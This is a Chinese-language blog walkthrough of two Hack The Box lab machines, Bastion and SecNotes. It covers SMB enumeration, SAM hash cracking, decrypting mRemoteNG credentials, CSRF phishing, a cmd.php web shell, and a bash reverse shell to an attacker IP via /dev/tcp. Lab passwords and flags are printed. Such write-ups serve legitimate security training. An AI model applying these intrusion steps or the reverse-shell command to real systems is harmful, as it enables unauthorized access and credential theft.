HTB-oscplike-Bastian+Secnotes

HTB-oscplike-Bastian+Secnotes

Bastian

easy难度的bastion 靶机IP 10.10.10.134

sudo nmap -sC -sV -p- --min-rate=1000 -Pn 10.10.10.134
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open msrpc?
139/tcp open netbios-ssn?
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open tcpwrapped

smbclient -N -L 10.10.10.134 看到
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
smbclient -N \\10.10.10.134\Backups 里面有note.txt和WindowsImageBackup
note.txt打开看到
Sysadmins: please don’t transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

不要整个拿过去 那就挂载吧
mount -t cifs //10.10.10.134/backups /tmp -o user=,password=
进去找到两个vhd虚拟磁盘
guestmount --add /tmp/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /temp/
进去可以看到C:\Windows\System32\config\SAM
爆破得到L4mpje/bureaulampje
ssh连进去

翻来翻去翻到一个文件夹C:\Program Files (x86)\mremoteng
google了一下发现在 c:\users%user%\appdata\roaming\mremoteng\confcons.xml里会有密码的信息泄露
在里面找到Username=“Administrator” Domain=“” Password=“aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==”

这串密码不是base64 但是github上有工具专门解
解出来密码是 thXLHM96BeKL0ER2 连上去就行
742aa8e404a88fe208d375dc4da33446
44eab37c86624604149920f4ce5b98d1
请添加图片描述

Secnotes

medium难度的SecNotes 靶机IP 10.10.10.97

sudo nmap -sC -sV -A -p- --min-rate=1000 -Pn 10.10.10.97
80/tcp open http Microsoft IIS httpd 10.0
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open http Microsoft IIS httpd 10.0

80里可以注册登录 里面发现有改密码和contact us 栏目
请添加图片描述

一开始我以为又是xss的利用 测试发现不是 但发送的如果是链接会被点击
那就简单了 根据主页上面有一行

Please contact tyler@secnotes.htb using the contact link below with any questions.

以及改密码抓包的参数 构造
http://10.10.10.97/change_pass.php?password=111111&confirm_password=111111&submit=submit
在contact里发给他 钓鱼得到 tyler/111111 登录进去翻到
\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&

smbclient -U tyler \\secnotes.htb\new-site 上去
上去发现我们到的是8808端口下 上传cmd.php然后连上去
拿到user的flag 9549d5f2555c5b06a263fd48e19fd3ec

同目录发现有一个很奇怪的bash.lnk 一个windows机子带个bash很不正常
同时根目录还有个ubantu.zip 那么会不会有可执行的bash呢
where.exe /R c:\ bash.* 看到有两个exe 随便挑一个

c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
bash.exe -c ‘bash -i >& /dev/tcp/10.10.14.19/7890 0>&1’

进去后是一个root的linux环境 但是root下面什么都没有
ls -la看到一个.bash_history 打开看到
smbclient -U ‘administrator%u6!4ZwgwOM#^OBf#Nwnh’ \\127.0.0.1\c$

直接连上去 都可以访问了 拿到flag
24187aa73e316d6341056bff327ca8e7

请添加图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值